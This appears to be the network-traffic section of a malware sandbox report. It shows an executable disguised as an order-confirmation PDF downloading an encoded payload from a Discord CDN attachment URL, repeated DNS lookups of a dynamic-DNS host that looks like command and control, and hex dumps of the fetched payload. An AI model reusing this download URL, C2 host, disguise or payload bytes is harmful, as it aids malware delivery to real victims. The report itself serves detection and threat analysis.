Jun 26, 2022 09:43:51.607608080 CEST | 59795 | 53 | 192.168.2.3 | 8.8.8.8
Jun 26, 2022 09:43:51.630036116 CEST | 53 | 59795 | 8.8.8.8 | 192.168.2.3
Jun 26, 2022 09:44:11.454999924 CEST | 64816 | 53 | 192.168.2.3 | 8.8.8.8
Jun 26, 2022 09:44:11.476694107 CEST | 53 | 64816 | 8.8.8.8 | 192.168.2.3
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Jun 26, 2022 09:42:47.586988926 CEST | 192.168.2.3 | 8.8.8.8 | 0xf2b2 | Standard query (0) | cdn.discordapp.com | A (IP address) | IN (0x0001)
Jun 26, 2022 09:43:08.861673117 CEST | 192.168.2.3 | 8.8.8.8 | 0x4a2c | Standard query (0) | cdn.discordapp.com | A (IP address) | IN (0x0001)
Jun 26, 2022 09:43:10.750699997 CEST | 192.168.2.3 | 8.8.8.8 | 0xf7d7 | Standard query (0) | blessmyhustlelord.ddns.net | A (IP address) | IN (0x0001)
Jun 26, 2022 09:43:13.523336887 CEST | 192.168.2.3 | 8.8.8.8 | 0x88e8 | Standard query (0) | blessmyhustlelord.ddns.net | A (IP address) | IN (0x0001)
Jun 26, 2022 09:43:16.191664934 CEST | 192.168.2.3 | 8.8.8.8 | 0xbbc8 | Standard query (0) | blessmyhustlelord.ddns.net | A (IP address) | IN (0x0001)
Jun 26, 2022 09:43:17.117027998 CEST | 192.168.2.3 | 8.8.8.8 | 0xca4c | Standard query (0) | cdn.discordapp.com | A (IP address) | IN (0x0001)
Jun 26, 2022 09:43:21.610383034 CEST | 192.168.2.3 | 8.8.8.8 | 0xbd6a | Standard query (0) | blessmyhustlelord.ddns.net | A (IP address) | IN (0x0001)
Jun 26, 2022 09:43:24.196943998 CEST | 192.168.2.3 | 8.8.8.8 | 0xcaa3 | Standard query (0) | blessmyhustlelord.ddns.net | A (IP address) | IN (0x0001)
Jun 26, 2022 09:43:26.996424913 CEST | 192.168.2.3 | 8.8.8.8 | 0xf5b4 | Standard query (0) | blessmyhustlelord.ddns.net | A (IP address) | IN (0x0001)
Jun 26, 2022 09:43:29.759982109 CEST | 192.168.2.3 | 8.8.8.8 | 0x2aba | Standard query (0) | blessmyhustlelord.ddns.net | A (IP address) | IN (0x0001)
Jun 26, 2022 09:43:32.412154913 CEST | 192.168.2.3 | 8.8.8.8 | 0xf76a | Standard query (0) | blessmyhustlelord.ddns.net | A (IP address) | IN (0x0001)
Jun 26, 2022 09:43:35.037820101 CEST | 192.168.2.3 | 8.8.8.8 | 0x1bd7 | Standard query (0) | blessmyhustlelord.ddns.net | A (IP address) | IN (0x0001)
Jun 26, 2022 09:43:38.386646032 CEST | 192.168.2.3 | 8.8.8.8 | 0xfecc | Standard query (0) | blessmyhustlelord.ddns.net | A (IP address) | IN (0x0001)
Jun 26, 2022 09:43:41.126136065 CEST | 192.168.2.3 | 8.8.8.8 | 0x7b86 | Standard query (0) | blessmyhustlelord.ddns.net | A (IP address) | IN (0x0001)
Jun 26, 2022 09:43:43.728009939 CEST | 192.168.2.3 | 8.8.8.8 | 0x3b18 | Standard query (0) | blessmyhustlelord.ddns.net | A (IP address) | IN (0x0001)
Jun 26, 2022 09:43:46.310242891 CEST | 192.168.2.3 | 8.8.8.8 | 0x1b19 | Standard query (0) | blessmyhustlelord.ddns.net | A (IP address) | IN (0x0001)
Jun 26, 2022 09:43:48.924099922 CEST | 192.168.2.3 | 8.8.8.8 | 0x2b24 | Standard query (0) | blessmyhustlelord.ddns.net | A (IP address) | IN (0x0001)
Jun 26, 2022 09:43:51.607608080 CEST | 192.168.2.3 | 8.8.8.8 | 0x4b04 | Standard query (0) | blessmyhustlelord.ddns.net | A (IP address) | IN (0x0001)
Jun 26, 2022 09:44:11.454999924 CEST | 192.168.2.3 | 8.8.8.8 | 0xb37a | Standard query (0) | blessmyhustlelord.ddns.net | A (IP address) | IN (0x0001)
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Jun 26, 2022 09:42:47.607784033 CEST | 8.8.8.8 | 192.168.2.3 | 0xf2b2 | No error (0) | cdn.discordapp.com | | 162.159.130.233 | A (IP address) | IN (0x0001)
Jun 26, 2022 09:42:47.607784033 CEST | 8.8.8.8 | 192.168.2.3 | 0xf2b2 | No error (0) | cdn.discordapp.com | | 162.159.134.233 | A (IP address) | IN (0x0001)
Jun 26, 2022 09:42:47.607784033 CEST | 8.8.8.8 | 192.168.2.3 | 0xf2b2 | No error (0) | cdn.discordapp.com | | 162.159.129.233 | A (IP address) | IN (0x0001)
Jun 26, 2022 09:42:47.607784033 CEST | 8.8.8.8 | 192.168.2.3 | 0xf2b2 | No error (0) | cdn.discordapp.com | | 162.159.133.233 | A (IP address) | IN (0x0001)
Jun 26, 2022 09:42:47.607784033 CEST | 8.8.8.8 | 192.168.2.3 | 0xf2b2 | No error (0) | cdn.discordapp.com | | 162.159.135.233 | A (IP address) | IN (0x0001)
Jun 26, 2022 09:43:08.881994963 CEST | 8.8.8.8 | 192.168.2.3 | 0x4a2c | No error (0) | cdn.discordapp.com | | 162.159.133.233 | A (IP address) | IN (0x0001)
Jun 26, 2022 09:43:08.881994963 CEST | 8.8.8.8 | 192.168.2.3 | 0x4a2c | No error (0) | cdn.discordapp.com | | 162.159.134.233 | A (IP address) | IN (0x0001)
Jun 26, 2022 09:43:08.881994963 CEST | 8.8.8.8 | 192.168.2.3 | 0x4a2c | No error (0) | cdn.discordapp.com | | 162.159.130.233 | A (IP address) | IN (0x0001)
Jun 26, 2022 09:43:08.881994963 CEST | 8.8.8.8 | 192.168.2.3 | 0x4a2c | No error (0) | cdn.discordapp.com | | 162.159.129.233 | A (IP address) | IN (0x0001)
Jun 26, 2022 09:43:08.881994963 CEST | 8.8.8.8 | 192.168.2.3 | 0x4a2c | No error (0) | cdn.discordapp.com | | 162.159.135.233 | A (IP address) | IN (0x0001)
Jun 26, 2022 09:43:10.774064064 CEST | 8.8.8.8 | 192.168.2.3 | 0xf7d7 | No error (0) | blessmyhustlelord.ddns.net | | 37.0.14.195 | A (IP address) | IN (0x0001)
Jun 26, 2022 09:43:13.544734001 CEST | 8.8.8.8 | 192.168.2.3 | 0x88e8 | No error (0) | blessmyhustlelord.ddns.net | | 37.0.14.195 | A (IP address) | IN (0x0001)
Jun 26, 2022 09:43:16.214441061 CEST | 8.8.8.8 | 192.168.2.3 | 0xbbc8 | No error (0) | blessmyhustlelord.ddns.net | | 37.0.14.195 | A (IP address) | IN (0x0001)
Jun 26, 2022 09:43:17.139172077 CEST | 8.8.8.8 | 192.168.2.3 | 0xca4c | No error (0) | cdn.discordapp.com | | 162.159.134.233 | A (IP address) | IN (0x0001)
Jun 26, 2022 09:43:17.139172077 CEST | 8.8.8.8 | 192.168.2.3 | 0xca4c | No error (0) | cdn.discordapp.com | | 162.159.129.233 | A (IP address) | IN (0x0001)
Jun 26, 2022 09:43:17.139172077 CEST | 8.8.8.8 | 192.168.2.3 | 0xca4c | No error (0) | cdn.discordapp.com | | 162.159.135.233 | A (IP address) | IN (0x0001)
Jun 26, 2022 09:43:17.139172077 CEST | 8.8.8.8 | 192.168.2.3 | 0xca4c | No error (0) | cdn.discordapp.com | | 162.159.130.233 | A (IP address) | IN (0x0001)
Jun 26, 2022 09:43:17.139172077 CEST | 8.8.8.8 | 192.168.2.3 | 0xca4c | No error (0) | cdn.discordapp.com | | 162.159.133.233 | A (IP address) | IN (0x0001)
Jun 26, 2022 09:43:21.631690025 CEST | 8.8.8.8 | 192.168.2.3 | 0xbd6a | No error (0) | blessmyhustlelord.ddns.net | | 37.0.14.195 | A (IP address) | IN (0x0001)
Jun 26, 2022 09:43:24.216413021 CEST | 8.8.8.8 | 192.168.2.3 | 0xcaa3 | No error (0) | blessmyhustlelord.ddns.net | | 37.0.14.195 | A (IP address) | IN (0x0001)
Jun 26, 2022 09:43:27.015767097 CEST | 8.8.8.8 | 192.168.2.3 | 0xf5b4 | No error (0) | blessmyhustlelord.ddns.net | | 37.0.14.195 | A (IP address) | IN (0x0001)
Jun 26, 2022 09:43:29.777625084 CEST | 8.8.8.8 | 192.168.2.3 | 0x2aba | No error (0) | blessmyhustlelord.ddns.net | | 37.0.14.195 | A (IP address) | IN (0x0001)
Jun 26, 2022 09:43:32.433199883 CEST | 8.8.8.8 | 192.168.2.3 | 0xf76a | No error (0) | blessmyhustlelord.ddns.net | | 37.0.14.195 | A (IP address) | IN (0x0001)
Jun 26, 2022 09:43:35.058957100 CEST | 8.8.8.8 | 192.168.2.3 | 0x1bd7 | No error (0) | blessmyhustlelord.ddns.net | | 37.0.14.195 | A (IP address) | IN (0x0001)
Jun 26, 2022 09:43:38.407360077 CEST | 8.8.8.8 | 192.168.2.3 | 0xfecc | No error (0) | blessmyhustlelord.ddns.net | | 37.0.14.195 | A (IP address) | IN (0x0001)
Jun 26, 2022 09:43:41.147382021 CEST | 8.8.8.8 | 192.168.2.3 | 0x7b86 | No error (0) | blessmyhustlelord.ddns.net | | 37.0.14.195 | A (IP address) | IN (0x0001)
Jun 26, 2022 09:43:43.747239113 CEST | 8.8.8.8 | 192.168.2.3 | 0x3b18 | No error (0) | blessmyhustlelord.ddns.net | | 37.0.14.195 | A (IP address) | IN (0x0001)
Jun 26, 2022 09:43:46.329695940 CEST | 8.8.8.8 | 192.168.2.3 | 0x1b19 | No error (0) | blessmyhustlelord.ddns.net | | 37.0.14.195 | A (IP address) | IN (0x0001)
Jun 26, 2022 09:43:48.941359043 CEST | 8.8.8.8 | 192.168.2.3 | 0x2b24 | No error (0) | blessmyhustlelord.ddns.net | | 37.0.14.195 | A (IP address) | IN (0x0001)
Jun 26, 2022 09:43:51.630036116 CEST | 8.8.8.8 | 192.168.2.3 | 0x4b04 | No error (0) | blessmyhustlelord.ddns.net | | 37.0.14.195 | A (IP address) | IN (0x0001)
Jun 26, 2022 09:44:11.476694107 CEST | 8.8.8.8 | 192.168.2.3 | 0xb37a | No error (0) | blessmyhustlelord.ddns.net | | 37.0.14.195 | A (IP address) | IN (0x0001)
                                • cdn.discordapp.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.3 | 49716 | 162.159.130.233 | 443 | C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe
Timestamp | kBytes transferred | Direction | Data
2022-06-26 07:42:48 UTC | 0 | OUT | GET /attachments/990482594137251863/990489253987360768/Eluiezilfwmdrgrdfrqpnwmurrnwnhm HTTP/1.1
                                User-Agent: lVali
                                Host: cdn.discordapp.com
2022-06-26 07:42:48 UTC | 0 | IN | HTTP/1.1 200 OK
                                Date: Sun, 26 Jun 2022 07:42:48 GMT
                                Content-Type: application/octet-stream
                                Content-Length: 279040
                                Connection: close
                                CF-Ray: 72144eee880abb5b-FRA
                                Accept-Ranges: bytes
                                Cache-Control: public, max-age=31536000
                                Content-Disposition: attachment;%20filename=Eluiezilfwmdrgrdfrqpnwmurrnwnhm
                                ETag: "7d74af495b07aad93486870343b767e3"
                                Expires: Mon, 26 Jun 2023 07:42:48 GMT
                                Last-Modified: Sun, 26 Jun 2022 05:30:40 GMT
                                Vary: Accept-Encoding
                                CF-Cache-Status: MISS
                                Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                x-goog-generation: 1656221440589477
                                x-goog-hash: crc32c=Xt3y7g==
                                x-goog-hash: md5=fXSvSVsHqtk0hocDQ7dn4w==
                                x-goog-metageneration: 1
                                x-goog-storage-class: STANDARD
                                x-goog-stored-content-encoding: identity
                                x-goog-stored-content-length: 279040
                                X-GUploader-UploadID: ADPycdu_Q0Tpycrk7qS4E4nzePhDznye5MF6EVmpLkOqf7VktTc-kyY8fGFrFg0abSjemjhV5OiEBDAd8z50hKsfTtoAqBDmNq2v
                                X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=P4hq7FwYClRoOBJKDSoiJfy5Ac%2FwQ9PfUtJ%2FI7GBUdPo4s6kyuCtSRAf%2Fucz36kazVouAf4UMCaC7aF8JTaey%2FwS9FJVFEVtewmWpoQIs%2BJ15Cv8cPZoGocgY4Vyun1OSrt7QA%3D%3D"}],"group":"cf-nel","max_age":604800}
2022-06-26 07:42:48 UTC | 1 | IN | Data Raw: 4e 45 4c 3a 20 7b 22 73 75 63 63 65 73 73 5f 66 72 61 63 74 69 6f 6e 22 3a 30 2c 22 72 65 70 6f 72 74 5f 74 6f 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30 7d 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 0d 0a
                                Data Ascii: NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflare
                                2022-06-26 07:42:48 UTC1INData Raw: 28 7f b5 25 de 25 25 25 29 25 25 25 da da 25 25 dd 25 25 25 25 25 25 25 65 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 dc 25 25 33 fa df 33 25 d9 e4 a8 fc dd dc 71 a8 fc 79 8d 44 4e 45 95 97 4a 42 97 3c 48 45 3e 3c 93 93 4a 99 45 87 40 45 97 50 93 45 44 93 45 69 2a 2e 45 48 4a 89 40 53 e8 e8 2f 49 25 25 25 25 25 25 25 19 fb 3d ab d5 92 9b b0 d5 92 9b b0 d5 92 9b b0 0e 86 9d b0 92 92 9b b0 ba cd 58 b0 8e 92 9b b0 ba cd a1 b0 96 92 9b b0 ba cd 97 b0 d7 92 9b b0 63 9a 04 b0 90 92 9b b0 7d cd 58 b0 8e 92 9b b0 63 9a 3b b0 8c 92 9b b0 d5 92 52 b0 a5 db 9b b0 0e 9a 06 b0 7e 92 9b b0 ab 6c 58 b0 47 92 9b b0 ab 6c a1 b0 8c 92 9b b0 86 4f 01 b0 d9 92 9b b0 52 8c 95 b0 8c 92 9b b0 77 44 3e 8d d5 92 9b
                                Data Ascii: (%%%%)%%%%%%%%%%%%e%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%33%qyDNEJB<HE><JE@EPEDEi*.EHJ@S/I%%%%%%%=Xc}Xc;R~lXGlORwD>
                                2022-06-26 07:42:48 UTC2INData Raw: 59 65 25 ec 79 24 93 99 40 97 8b 3c 3e 40 89 2a 87 8f 40 3e 99 66 e5 da 00 b5 cc 1c 25 66 e5 da 00 b1 cc 1c 25 66 e5 da 00 ad cc 1c 25 66 e5 da 00 a9 cc 1c 25 66 e5 da 00 a5 cc 1c 25 66 e5 da 00 c9 cc 1c 25 66 e5 da 00 a1 cc 1c 25 66 e5 da 00 c5 cc 1c 25 66 e5 da 00 9d cc 1c 25 66 e5 da 00 99 cc 1c 25 66 e5 da 00 95 cc 1c 25 66 e5 da 00 91 cc 1c 25 66 e5 da 00 8d cc 1c 25 66 e5 da 00 89 cc 1c 25 66 e5 da 00 85 cc 1c 25 66 e5 da 00 81 cc 1c 25 66 e5 da 00 7d cc 1c 25 66 e5 da 00 79 cc 1c 25 66 e5 da 00 75 cc 1c 25 66 e5 da 00 c1 cc 1c 25 66 e5 da 00 71 cc 1c 25 66 e5 da 00 6d cc 1c 25 66 e5 da 00 69 cc 1c 25 66 e5 da 00 d9 cc 1c 25 66 e5 da 00 d5 cc 1c 25 66 e5 da 00 d1 cc 1c 25 66 e5 da 00 65 cc 1c 25 66 e5 da 00 61 cc 1c 25 66 e5 da 00 e9 cc 1c 25 66 e5
                                Data Ascii: Ye%y$@<>@*@>f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f}%fy%fu%f%fq%fm%fi%f%f%f%fe%fa%f%f
                                2022-06-26 07:42:48 UTC4INData Raw: 25 66 2b 66 65 2d 75 0d 3b 21 da da 60 e5 50 2f a2 e0 ed c0 1c 25 dc 25 25 25 66 2b 0d ec d8 da da 66 69 49 29 64 2b dd 11 c0 1c 25 16 2b 50 b1 0e e5 64 e2 5e a1 49 31 25 99 ec 66 69 49 2d 64 e2 66 69 49 31 06 69 49 2d 64 22 29 5e e9 3d 38 3a 83 36 9e 66 e5 2e 7b 32 30 5e e9 0d 66 b4 64 39 49 68 99 49 2d 68 a1 49 29 68 91 49 31 66 f5 66 ef 5c bc 25 15 da da 64 71 49 35 de 39 49 5c e7 da ea 25 25 5c 07 25 15 da da 64 79 49 39 66 69 49 35 64 de 66 69 49 39 06 69 49 35 64 1e 29 7c 11 c0 1c 25 64 e2 c6 36 66 e2 66 65 2d 64 2b 66 e2 66 65 31 de 2b 64 20 25 66 2b 16 69 49 35 4e 2b 66 69 49 35 64 2b 66 20 25 16 69 49 39 9b e2 66 69 49 39 64 20 25 66 2b 16 20 25 4e fa 8f 29 8d 25 35 25 25 66 20 25 06 2b 75 66 2b 75 0d 4b d6 da da 60 e5 50 2b 0e e5 64 de c6 ea 66
                                Data Ascii: %f+fe-u;!`P/%%%%f+fiI)d+%+Pd^I1%fiI-dfiI1iI-d")^=8:6f.{20^fd9IhI-hI)hI1ff\%dqI59I\%%\%dyI9fiI5dfiI9iI5d)|%d6ffe-d+ffe1+d %f+iI5N+fiI5d+f %iI9fiI9d %f+ %N)%5%%f %+uf+uK`P+df
                                2022-06-26 07:42:48 UTC5INData Raw: 0d f9 1b da da eb e0 e9 c0 1c 25 25 7c 49 0b 1c 25 75 0d c7 1b da da 0e e5 7e 49 0b 1c 25 7c 11 c0 1c 25 64 20 1d c6 f6 8d 25 a5 25 25 8f 25 66 20 1d 66 65 2d 75 0d b3 1b da da 66 20 1d 66 25 64 20 1d dd 11 c0 1c 25 16 20 1d 50 b6 dd 11 c0 1c 25 0d 43 d2 da da dd 21 c0 1c 25 0d 39 d2 da da dd 4d 0b 1c 25 0d 2f d2 da da 7c 09 c0 1c 25 64 20 21 5e 58 21 25 99 fc 66 20 21 66 25 7e 09 c0 1c 25 66 20 21 75 0d 08 1b da da 7c 09 c0 1c 25 64 20 21 5e 58 21 25 50 ba 0e e5 7f 34 34 89 64 35 8d b2 41 65 25 a5 18 28 05 1c 25 25 99 2f 8d f1 c0 1c 25 0d 02 1b da da 8d f1 c0 1c 25 0d 00 1b da da 9e c4 8a 41 25 25 c6 b6 34 34 38 9e b5 2e 5e e9 1d 16 e0 3d 0b 1c 25 50 e4 66 75 29 64 f0 3d 0b 1c 25 66 75 29 64 39 49 66 75 2d 5c 1f 25 35 25 25 5a 73 16 29 49 50 f2 60 f7 54
                                Data Ascii: %%|I%u~I%|%d %%%%f fe-uf f%d % P%C!%9M%/|%d !^X!%f !f%~%f !u|%d !^X!%P44d5Ae%(%%/%%A%%448.^=%Pfu)d=%fu)d9Ifu-\%5%%Zs)IP`T
                                2022-06-26 07:42:48 UTC6INData Raw: 29 66 e2 7e 45 0b 1c 25 66 22 29 7e 41 0b 1c 25 d5 dc 5e e9 35 3a 83 36 9e 68 65 25 2e 5e e9 1d 66 fd 66 f9 68 1e 29 0d 19 1b da da 5e 61 49 25 99 e6 66 e9 0d 32 da da da a9 e5 50 29 0e e5 c6 27 d5 dc 34 7f 36 9e b5 2e 7b 5e e9 1d 66 17 66 fd 66 f1 68 7b 29 66 9e 0d 46 d2 da da 5e 61 49 25 99 e6 66 e9 0d 4b da da da a9 e5 50 29 0e e5 c6 27 d5 dc 34 7f 83 36 9e 68 65 25 2c 66 f9 0e a4 64 2f 60 e5 54 de 5e e5 de 9c 1d 27 18 25 29 25 25 5a f4 66 e8 49 0b 1c 25 66 71 5c 19 64 2f 5e 5f 25 50 2d 65 18 dc 29 25 25 50 c2 66 27 7f 9e 68 65 25 2e 7b 32 30 5e e9 19 66 fd 68 99 49 2d 9a 3d 0b 1c 25 98 41 0b 1c 25 7c 35 0b 1c 25 64 2b 66 2b 16 7d 2d ea b3 86 25 25 25 66 e2 64 2b 66 2b 66 65 2d 16 fd ea b3 bf 25 25 25 66 3b 64 7f 2d 66 3b 66 77 29 64 3b 66 3b 16 7f 2d
                                Data Ascii: )f~E%f")~A%^5:6he%.^ffh)^aI%f2P)'46.{^fffh{)fF^aI%fKP)'46he%,fd/`T^'%)%%ZfI%fq\d/^_%P-e)%%Pf'he%.{20^fhI-=%A%|5%d+f+}-%%%fd+f+fe-%%%f;d-f;fw)d;f;-
                                2022-06-26 07:42:48 UTC8INData Raw: 65 25 a5 18 28 05 1c 25 25 99 2f 8d f1 c0 1c 25 0d 3f 11 da da 9e c4 d1 37 25 25 c6 c0 66 20 21 36 66 c0 38 9e 66 e5 2e 7b 32 30 5e e9 19 66 ff 5e 9e e2 5e be 21 5e d6 31 58 e0 96 31 25 25 25 5e 0d 29 64 29 49 66 29 49 66 55 5c 0b 21 da da 5a 66 29 49 de eb 64 69 49 29 16 ce 50 e2 d5 dc c4 98 dc 25 25 16 ce ea b3 b5 25 25 25 66 13 06 c6 66 79 49 29 16 f0 45 0b 1c 25 50 51 04 08 45 0b 1c 25 dc 08 41 0b 1c 25 5e 18 41 0b 1c 25 31 ea 68 4a dc 25 25 dc 08 45 0b 1c 25 04 08 41 0b 1c 25 66 03 c4 81 dc 25 25 64 69 49 29 66 69 49 29 1b 25 27 50 3d 66 69 49 29 64 69 49 2d 66 69 49 2d de 8d 2d 66 69 49 2d 0d 2c d0 da da 5e d8 31 a1 fe 66 29 49 de 9e 64 69 49 29 5e a8 27 66 69 49 29 64 4d 66 69 49 29 5e e5 29 0d 67 1b da da c4 ea dc 25 25 66 03 c4 2d dc 25 25 66 d6
                                Data Ascii: e%(%%/%?7%%f !6f8f.{20^f^^!^1X1%%%^)d)If)IfU\!Zf)IdiI)P%%%%%ffyI)E%PQE%A%^A%1hJ%%E%A%f%%diI)fiI)%'P=fiI)diI-fiI--fiI-,^1f)IdiI)^'fiI)dMfiI)^)g%%f-%%f
                                2022-06-26 07:42:48 UTC9INData Raw: 2b a5 5d 47 50 e8 66 2b a5 9d dc 47 50 e0 5e 2b 27 c6 ba 0e c8 66 2b 64 69 49 31 c6 36 66 2b a5 5d 47 50 65 66 2b 75 0d 7b c0 da da 64 2b c6 39 66 2b 75 0d 6f c0 da da 64 e2 66 e2 06 2b de 0d 66 e2 64 2b 66 2b af 3d a9 b6 99 e0 a5 d6 47 50 ba 66 2b a5 5d 25 99 45 66 2b 75 0d 47 c0 da da 64 2b c6 39 66 2b 75 0d 3b c0 da da 64 e2 66 e2 06 2b de 0d 66 e2 64 2b 66 2b a5 5d 45 52 c3 66 69 49 29 66 b0 0d 9d f4 25 25 66 69 49 31 64 2b 66 69 49 29 66 25 64 69 49 35 0e c8 c6 56 66 2b a5 5d 47 50 75 66 2b 75 0d b0 09 da da 64 2b c6 49 66 2b 75 0d a4 09 da da 64 e2 66 2b 16 e2 4e 39 66 2b af 25 66 79 49 35 ad 29 4f da 2b 20 66 2b 16 e2 97 11 66 2b af 3d a9 b6 99 e0 a5 d6 47 50 aa 66 2b a5 5d 25 99 55 66 2b 75 0d 6c 09 da da 64 2b c6 49 66 2b 75 0d 60 09 da da 64 e2
                                Data Ascii: +]GPf+GP^+'f+diI16f+]GPef+u{d+9f+uodf+fd+f+=GPf+]%Ef+uGd+9f+u;df+fd+f+]ERfiI)f%%fiI1d+fiI)f%diI5Vf+]GPuf+ud+If+udf+N9f+%fyI5)O+ f+f+=GPf+]%Uf+uld+If+u`d
                                2022-06-26 07:42:48 UTC10INData Raw: 59 65 25 25 25 a0 53 e1 c7 8c 12 65 25 25 65 9b 5f 46 e6 03 5f 65 25 25 0d 64 29 fe a2 af 63 65 25 25 87 d1 a0 c6 9d 88 1c 65 25 a5 9f f2 92 4b b2 fd 69 65 25 b5 d1 93 57 9d ab 62 6d 65 25 d9 32 2f 1a 3b 8d 84 26 65 25 7c c8 f1 f3 f6 e7 ae 73 65 c5 a9 39 65 3c 2c 34 a9 77 65 ed 80 f4 b5 94 80 4a 80 30 65 5f ea 45 19 02 6a a6 f3 7d 65 a9 e4 b9 1d 9d 14 1a 5c 81 65 c0 e6 94 5b b2 e2 6a 7c 3a 65 ba 73 42 29 a8 a4 17 a4 87 65 bb 47 5c 20 65 a1 4a 21 40 65 c3 90 95 06 cd 88 a0 78 44 65 b0 cb aa da 24 fa 9d e7 ae 65 7e 39 76 a0 3b 86 8e ca 18 1c 05 b1 c4 a5 a4 22 df 6e cd 1c cf f2 0b 5a 06 7c 3b db 37 67 46 30 02 14 68 d2 95 05 a1 67 55 a4 61 be da bb 77 af c2 67 b3 03 d4 78 d6 c6 a3 cf 2c 1e b1 0a 8f 81 f4 21 4b f7 96 1e 9b be f1 17 04 0a a9 5c 4b 69 f7 2f b5
                                Data Ascii: Ye%%%Se%%e_F_e%%d)ce%%e%Kie%Wbme%2/;&e%|se9e<,4weJ0e_Ej}e\e[j|:esB)eG\ eJ!@exDe$e~9v;"nZ|;7gF0hgUawgx,!K\Ki/
                                2022-06-26 07:42:48 UTC12INData Raw: 7b 8b 66 57 8b e4 1b 99 f2 8b 5c 23 25 e5 4e 35 75 66 25 0d 9d da da da 7d 99 e0 64 cc 83 da bc 83 66 2d da 3c 15 9e b5 77 2c 2e a9 f7 a1 de da 75 19 0c f7 68 71 49 35 89 66 3f 64 f4 64 44 2d a2 1c 29 f4 12 65 25 64 1c 31 89 64 2f 36 34 7f 9e c4 5f dc 25 25 66 69 49 51 66 65 31 60 e5 99 33 66 2d d7 5c 75 da 2c 21 7d 0d e4 25 25 25 0d cd 27 25 25 9e 68 65 25 66 35 da 77 1d 9e 66 e5 2e 66 fd 66 9e 66 35 da 77 09 66 9e 36 9e 66 e5 a9 f7 5a dc 9e 75 77 66 35 da 77 0d 7f 7d 9e b5 a5 18 4d e5 1c 25 dc 9b ec 8f 25 8f 25 8f 25 8d ba 1f c8 33 da f0 39 05 1c 25 9e b5 a5 18 4d e5 1c 25 25 99 f2 75 75 77 79 8f 27 8f 25 8d 09 1f c8 33 da f0 39 05 1c 25 5e e9 2d 7d 9e 68 65 25 79 8f dc 8f 25 8d 05 1f c8 33 da f0 39 05 1c 25 5e e9 29 7d 9e 68 65 25 a5 18 4d e5 1c 25 dc
                                Data Ascii: {fW\#%N5uf%}df-<w,.uhqI5f?ddD-)e%d1d/64_%%fiIQfe1`3f-\u,!}%%%'%%he%f5wf.fff5wf6fZuwf5w}M%%%%39%M%%uuwy'%39%^-}he%y%39%^)}he%M%
                                2022-06-26 07:42:48 UTC13INData Raw: 65 29 64 20 21 0e e5 30 8d 38 61 65 25 89 da 55 89 64 45 60 b6 a3 f6 26 64 83 31 66 20 21 66 69 fd 29 64 20 1d 5e 58 1d 25 99 de da 30 1d 60 b6 5a c0 0e e5 7f 34 34 89 64 35 c6 39 c4 1b d6 da da 0d 7c da da da 0d 9d d8 da da 0d a2 d8 da da 3a 83 36 34 34 38 9e 30 66 11 5e e9 1d 2e 7b 32 9a 5d 0b 1c 25 66 22 2d 60 e5 99 79 66 55 0e b6 66 65 29 64 20 21 0e e5 30 8d a8 61 65 25 89 da 55 89 64 45 16 ce a3 3f 66 20 21 66 29 fd 64 20 1d 1e 64 3a 31 5e 58 1d 25 99 de da 30 1d 16 ce 5a 0b 0e e5 7f 34 34 89 64 35 c6 39 c4 ab d6 da da 0d 0c da da da 0d 2d d8 da da 0d 32 d8 da da 3a 83 36 34 34 38 9e 2c 7b 32 e3 5d 0b 1c 25 68 58 e9 94 e6 25 25 25 ce 80 6a e0 7d 0b 1c 25 6a e0 79 0b 1c 25 64 08 71 0b 1c 25 64 f8 75 0b 1c 25 7e 65 0b 1c 25 64 f0 6d 0b 1c 25 68 28 e9
                                Data Ascii: e)d !08ae%UdE`&d1f !fi)d ^X%0`Z44d59|:64480f^.{2]%f"-`yfUfe)d !0ae%UdE?f !f)d d:1^X%0Z44d59-2:6448,{2]%hX%%%j}%jy%dq%du%~e%dm%h(
                                2022-06-26 07:42:48 UTC14INData Raw: 0d 7c f5 da da 38 e7 29 25 b5 2e 7b 32 30 5c e9 29 15 da da 75 5e e9 21 66 cc 64 39 49 66 1d 60 1b 5a e4 66 a2 0d a9 23 da da c6 3a 68 93 dc 5c d8 da e2 25 25 58 4d 7b 68 69 49 2d 66 71 49 29 df da ea 25 25 0d a9 da da da 66 fd 60 b6 a1 ea 68 79 49 29 66 a2 66 a6 0d 1c da da da c6 51 66 b8 de b6 66 a2 66 ae 0d 57 29 25 25 7b 66 e2 66 71 49 29 66 ae 0d 79 da da da 66 fd 60 b6 58 27 0e b6 66 a2 66 ae 0d ee 29 25 25 5c e9 29 35 25 25 38 3a 83 36 9e 77 64 07 94 dc 25 25 25 0d d6 23 da da 7f 9e b5 0c a4 60 f7 99 fc 77 5f 2f 99 f2 5f 6f dc 99 ec 5f 6f 27 99 e6 5f 6f de 99 e0 5e e7 29 c6 0d 67 67 67 64 ac 7f 04 ac c4 f1 23 da da 9e 68 65 25 0c a4 60 f7 99 08 77 8b 16 2f 99 45 8b 16 6f 27 99 f2 8b 16 6f 29 99 33 8b 16 6f 2b 99 e0 5e e7 2d c6 09 5e e7 27 5e e7 27
                                Data Ascii: |8)%.{20\)u^!fd9If`Zf#:h\%%XM{hiI-fqI)%%f`hyI)ffQfffW)%%{ffqI)fyf`X'ff)%%\)5%%8:6wd%%%#`w_/_o_o'_o^)gggd#he%`w/Eo'o)3o+^-^'^'
